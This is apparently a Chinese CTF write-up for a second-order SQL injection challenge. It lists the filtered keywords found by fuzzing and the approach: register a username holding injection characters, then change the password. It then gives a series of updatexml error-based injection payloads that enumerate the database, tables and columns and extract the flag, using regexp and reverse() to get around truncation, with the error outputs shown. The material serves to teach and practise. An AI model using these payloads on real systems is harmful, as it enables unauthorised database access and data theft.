Fuzz 测试
过滤:
and insert ascii substr left rigth sleep floor < like /**/ %20
思路: 注册带有危险符号的用户,登录之后修改密码,就能达到二次注入的效果
爆破: admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1
用户: admin"or(updatexml('~',concat('~',database(),'~'),'~'))or"1
XPATH syntax error: '~web_sqli~'
表: admin"or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),'~'),'~'))or"1
XPATH syntax error: '~article,flag,users~'
列: admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),'~'),'~'))or"1
admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),'~'),'~'))or"1
XPATH syntax error: '~flag~'
name,pwd,email,real_flag_1s_her
ereh_s1_galf_laer,liame,dwp,ema
flag
admin"or(updatexml('~',concat('~',(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1
admin"or(updatexml('~',concat('~',(select(REVERSE(GROUP_CONCAT(real_flag_1s_here)))from(web_sqli.users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1
上面是自己研究的一些思路和姿势,以及写题的流程。
题目的考点是二次注入,报错注入,sql正则函数,reverse()函数。